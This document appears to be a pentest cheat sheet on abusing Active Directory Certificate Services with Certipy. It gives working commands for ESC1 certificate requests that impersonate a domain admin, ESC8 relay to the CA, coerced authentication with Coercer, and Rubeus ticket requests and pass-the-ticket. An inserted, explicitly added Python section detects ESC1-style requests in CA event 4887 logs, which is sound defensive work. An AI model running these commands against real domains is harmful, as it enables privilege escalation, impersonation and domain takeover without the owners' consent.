certipy.py

Find all certs

certipy find -u user@domain.com -p '' -debug
  • Hint: use -scheme ldap if you get a bunch of annoying LDAP errors.

Find all VULNERABLE certs

certipy find -vulnerable -u user@domain.com -p '' -debug
  • Hint: use -scheme ldap if you get a bunch of annoying LDAP errors.

Abuse ESC1

sudo certipy req -username lowpriv@domain.com -password 'winter2021' -ca CA-01 -target vuln.domain.com -template 'vuln-template' -upn da-i-want-to-impersonate@domain.com -dns fqdn-of-a-dc.domain.com -key-size 4096

Auth with the cert you just got

certipy auth -pfx administrator.pfx -dc-ip 172.16.126.128
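Defender-side companion to the ESC1 request above (added example, not part of the original notes): the request leaves a trace in the CA's Security log as event 4887, whose Attributes field carries the caller-supplied SAN when it was passed as a request attribute. The sample records below are constructed; the check flags any issued cert where the SAN names an identity other than the requester, which is exactly what the -upn / -dns request does. It assumes the SAN shows up in Attributes; a SAN carried only inside the CSR extension has to be checked from the CA database instead.

```python
import re

# Constructed sample records modelled on the Requester / Attributes fields of
# Windows Security event 4887 ("Certificate Services approved a certificate
# request and issued a certificate"). Names and values are made up.
SAMPLE_EVENTS = [
    {"RequestId": "101", "Requester": "DOMAIN\\lowpriv",
     "Attributes": "CertificateTemplate:vuln-template\n"
                   "SAN:upn=administrator@domain.com&dns=dc01.domain.com"},
    {"RequestId": "102", "Requester": "DOMAIN\\alice",
     "Attributes": "CertificateTemplate:User"},
    {"RequestId": "103", "Requester": "DOMAIN\\bob",
     "Attributes": "CertificateTemplate:User\nSAN:upn=bob@domain.com"},
]

SAN_RE = re.compile(r"^SAN:(.*)$", re.MULTILINE)


def parse_san(attributes):
    """Return {'upn': [...], 'dns': [...]} from a 'SAN:k=v&k=v' line, or {} if absent."""
    m = SAN_RE.search(attributes)
    if not m:
        return {}
    out = {}
    for part in m.group(1).split("&"):
        if "=" in part:
            k, v = part.split("=", 1)
            out.setdefault(k.strip().lower(), []).append(v.strip())
    return out


def requester_account(requester):
    """'DOMAIN\\user' -> 'user' (lowercase sAMAccountName)."""
    return requester.rsplit("\\", 1)[-1].lower()


def find_suspicious(events):
    """Flag issued certs whose caller-supplied SAN does not match the requester."""
    hits = []
    for ev in events:
        san = parse_san(ev.get("Attributes", ""))
        if not san:
            continue  # no caller-supplied SAN: not an ESC1-style request
        who = requester_account(ev["Requester"])
        for upn in san.get("upn", []):
            if upn.split("@", 1)[0].lower() != who:
                hits.append((ev["RequestId"], who, "upn=" + upn))
        if not who.endswith("$"):  # a user (not machine) account asking for a hostname
            for dns in san.get("dns", []):
                hits.append((ev["RequestId"], who, "dns=" + dns))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("review request %s: %s asked for SAN %s" % hit)
```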

Abuse ESC8

certipy relay -target vulnca.domain.com -template DomainController / KerberosAuthentication / DC

Coerce auth

sudo python3 /opt/coercer/Coercer.py coerce -u x -p x -t x -l x

Abuse the cert

certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER

Sanity check the CA is vulnerable to ESC8 with curl!

curl -sSLkI -u 'NETBIOS-NAME-OF-DOMAIN\user:password' --ntlm https://name.of.the.ca/certsrv/certfnsh.asp

If you get a 401 Unauthorized, the endpoint has been hardened.

Note: if I call this file certipy.md in the file hierarchy, docusaurus crashes. Wassupwitdat? I raised an issue in GitHub for this